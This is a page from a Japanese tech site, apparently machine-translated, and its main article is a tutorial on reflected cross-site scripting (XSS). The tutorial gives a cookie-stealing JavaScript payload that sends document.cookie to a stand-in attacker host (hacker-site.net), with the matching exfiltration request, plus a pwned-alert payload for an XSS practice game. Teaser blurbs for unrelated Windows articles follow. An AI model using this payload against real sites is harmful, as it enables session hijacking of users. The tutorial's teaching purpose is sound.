Windows 10で画面右隅に表示される著作権侵害の通知を削除する方法
画面の右隅に Windows 10 のライセンス認証通知が表示されますか?この記事では、Windows10で著作権侵害の通知を削除する方法をご紹介します。
Web7: XSS エクスプロイト – パート 1: リフレクション XSS
クロスサイトスクリプティングとは何ですか?
クロスサイト スクリプティング(XSS) は、今日最も人気のある攻撃手法の 1 つであり、攻撃のゴッドファーザーとして知られており、長年にわたってアプリケーションに対する最も危険な攻撃手法として挙げられてきました。
HTML のカスケード スタイル シートの概念との混同を避けるため、略して CSS とは呼ばないでください。XSS
テクニックは
、Web アプリケーションのソース コードに危険なスクリプトを挿入することに基づいています。悪意のある Javascript コードを実行してユーザーのログイン セッションを乗っ取ること。
よりよく理解するために、次の例を考えてみましょう。 name 変数に Ping 値を渡すと仮定して、URL 経由で渡した値を印刷できる Web アプリケーション:
ここまではすべて問題ありません。HTML ソース コードを確認してみましょう。
簡単にわかるのは、入力した名前の値がソース コードに挿入されていることです。したがって、インポートされたものは何でも挿入できる可能性があります。入力された値が上記のような通常の文字列ではなく、次のような潜在的に危険なコードである場合、問題は深刻になります。
上記の値を使用して再試行してください。
この例から 2 つのことが結論付けられます。まず、name 変数は任意の入力値を受け取り、それを処理のためにサーバーに送信できます。第 2 に、サーバーはこの入力値をブラウザに返す前に制御しませんでした。これにより、JavaScript コードがソース コードに挿入されます。
XSS は通常、リフレクト型、ストア型、DOM ベースの 3 つの主要なタイプに分類されます。この記事では主に Reflected XSS 手法について説明します。
XSS 技術の最大 75% は Reflected XSS に基づいています。このタイプのエクスプロイト シナリオでは、ハッカーが悪意のあるコード (通常は JavaScript) を含む URL を被害者に送信する必要があるため、これはリフレクトと呼ばれます。被害者はこの URL をリクエストするだけで済み、ハッカーはすぐに目的の結果を含む応答を受け取ります (反射性はここに示されています)。また、一次 XSS とも呼ばれます。
現実の採掘シナリオ
Reflected XSS エラーを悪用する方法は数多くありますが、最もよく知られている方法の 1 つは、ユーザーのセッションを乗っ取り、それによってデータにアクセスし、Web サイト上の権限を取得することです。
詳細については、次の手順で説明します。
1. ユーザーは Web にログインし、セッションが割り当てられていると想定します。
Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d42. 何らかの方法で、ハッカーはユーザーに次の URL を送信します。
http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;example.com が被害者がアクセスする Web サイトであり、hacker-site.net がハッカーによって作成されたサイトであるとします。
3. 被害者は上記URLにアクセスします。
4. サーバーは、リクエストに含まれるデータ (ハッカーの JavaScript スニペット) とともに被害者に応答します。
5. 被害者のブラウザは応答を受信し、JavaScript を実行します。
6. ハッカーが作成した実際の JavaScript は次のとおりです。
var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;上記のコマンド ラインは基本的に、ユーザー Cookie をパラメータとしてハッカーのサイトにリクエストを送信します。
GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1Host: hacker-site.net7. ハッカーはあなたのサイトから上記のリクエスト内容をキャッチし、ユーザーのセッションが乗っ取られるとみなします。この時点で、ハッカーは被害者になりすまして、被害者が持つ Web サイト上のすべての権利を行使することができます。
練習する
Google は、XSS エラーの悪用を練習するためのページをここに作成しました: https://xss-game.appspot.com
これらの課題の目的は、ポップアップをポップアップするスクリプトを挿入する必要があることです。最初の課題は、リフレクション手法を説明することです。悪用コードは非常に単純です。
https://xss-game.appspot.com/level1/frame?query=alert('pwned')幸運を!
Windows 10 ビルド 14393.222 をインストールする方法に関する AZ からの指示
最近 Microsoft は、Windows 10 PC ユーザー向けにビルド 14393.222 と呼ばれる最新の累積的な更新プログラムをリリースしました。 Windows 10 向けにリリースされたこの更新プログラムは、主にユーザーのフィードバックに基づいてバグを修正し、オペレーティング システムのパフォーマンス エクスペリエンスを向上させます。
わずか 3 ステップで Bastion ホストを使用してコンピュータ ネットワークを保護します
ローカル ネットワーク上に外部アクセスが必要なコンピュータはありますか?要塞ホストをネットワークのゲートキーパーとして使用することは、良い解決策となる可能性があります。
キーボードが使用できない場合に Windows キーを作成する方法
IBM モデル M など、物理的な Windows キーが含まれていない古いクラシック キーボードを使用したい場合は、頻繁に使用しないキーを借用してキーを追加する簡単な方法があります。
Windows 10 のすべてのイベント ログをすばやくクリアする 3 つの方法
場合によっては、古いイベント ログを一度に削除する必要があるかもしれません。このガイドでは、Quantrimang.com が、Windows 10 イベント ビューアーですべてのイベント ログをすばやく削除する 3 つの方法を紹介します。
偽の IP メソッドを使用すると、匿名でアクセスできます
これまでの多くの記事で、オンラインで匿名性を保つことが非常に重要であると述べてきました。個人情報の漏洩は毎年発生しており、オンラインセキュリティの必要性はますます高まっています。これが、仮想 IP アドレスを使用する必要がある理由でもあります。以下では、偽の IP を作成する方法について学びます。
Windows 10で透明背景モードを作成する方法
WindowTop は、Windows 10 コンピューター上で実行されているすべてのアプリケーション ウィンドウとプログラムを暗くする機能を備えたツールです。または、Windows で暗い背景インターフェイスを使用することもできます。
Windows 8 タスクバーの言語バーをオフにする方法
Windows 8 の言語バーは、デスクトップ画面に自動的に表示されるように設計された小型言語ツールバーです。しかし、多くの人はタスクバー上のこの言語バーを非表示にしたいと考えています。
LinksysルーターのWEP、WPA、WPA2の設定方法
今日、ワイヤレス接続は必需品であり、そのため、内部ネットワークの安全を確保するにはワイヤレス セキュリティが不可欠です。
Linksys が提供するインターネット接続速度を最適化するためのヒント
ネットワーク接続を最適化するには、インターネット速度を最大化することが不可欠です。コンピューター、インターネット対応テレビ、ゲーム機などを使用して、最適なエンターテイメントと仕事体験を実現できます。